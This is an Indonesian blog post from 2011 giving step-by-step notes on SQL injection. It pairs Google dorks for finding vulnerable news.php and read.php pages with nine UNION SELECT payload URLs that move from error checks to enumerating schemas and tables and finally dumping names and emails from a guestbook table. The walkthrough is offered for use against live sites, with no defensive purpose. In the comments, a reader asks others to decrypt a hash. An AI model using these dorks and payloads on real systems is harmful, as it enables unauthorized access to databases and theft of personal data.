Langkah-langkah SQL injection


Artikel ini saya tulis sekedar mengingatkan saya saja langkah-langkah dari teknik SQL injection. anda yang lebih bijaksana.

Dork yang saya gunakan :

  • inurl:read.php?id=
  • inurl:news.php?id=

Langkah-langkah yang saya kerjakan :

  1. cek error vurnebility http://www.target.co.id/news.php?id=91′
  2. cek kolom http://www.target.co.id/news.php?id=91 order by 1
  3. cek kolom aktif http://www.target.co.id/news.php?id=-91+UNION+SELECT+1,2,3,4,5–
  4. cek versi database http://www.target.co.id/news.php?id=-91+UNION+SELECT+1,@@version,3,4,5–
  5. cek database yang ada http://www.target.co.id/news.php?id=-91+UNION+SELECT+1,group_concat(schema_name),3,4,5 from information_schema.schemata–
  6. cek database yang digunakan http://www.target.co.id/news.php?id=-91+UNION+SELECT+1,concat(database()),3,4,5 from information_schema.schemata–
  7. cek semua tabel http://www.target.co.id/news.php?id=-91+UNION+SELECT+1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema=database()–
  8. cek semua field http://www.target.co.id/news.php?id=-91+UNION+SELECT+1,group_concat(column_name),3,4,5 from information_schema.columns where table_schema=database()–
  9. cek isi field http://www.target.co.id/news.php?id=-91+UNION+SELECT+1,group_concat(nama,0x3a,email),3,4,5 from u1637_product.guestbook–

Tutorial yang saya pakai :
http://www.binushacker.net/sql-injection-tutorial.html

Situs yang pernah saya kunjungi :

Referensi yang saya baca :

CEHv6_Module_19_SQL_Injection

Capture :

http://www.4shared.com/file/VauozsYD/capture.html

Sekian dari saya semoga ada manfaatnya untuk teman-teman dan anda semua…aamin

Depok, 17-04-2011

noname

Advertisements

One Response

  1. Tau Gak Ini Di Encrypt pakai apa . . bd9058889d0804bddf2d9f30455199e2
    kalau bisa Decryptkan . . mohon bantuannya

    Like

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: